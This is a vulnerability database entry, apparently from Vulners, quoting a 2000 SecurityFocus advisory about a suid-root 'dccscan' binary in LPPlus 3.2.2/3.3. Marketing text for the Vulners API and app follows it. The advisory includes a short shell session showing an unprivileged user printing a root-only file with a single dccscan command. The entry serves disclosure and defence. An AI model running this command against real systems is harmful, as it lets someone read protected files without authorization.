Vulners
Lucene search
LPPlus 3.2.2/3.3 - dccscan Unprivileged read
source: https://www.securityfocus.com/bid/1644/info
$LPHOME/bin/dccscan is suid-root and can be executed by any user. It is possible for an unprivileged user to print files to which he does not have read access. In testing, this works even for printers to which the user is is not given any access in the LPPlus security configuration.
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstatData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4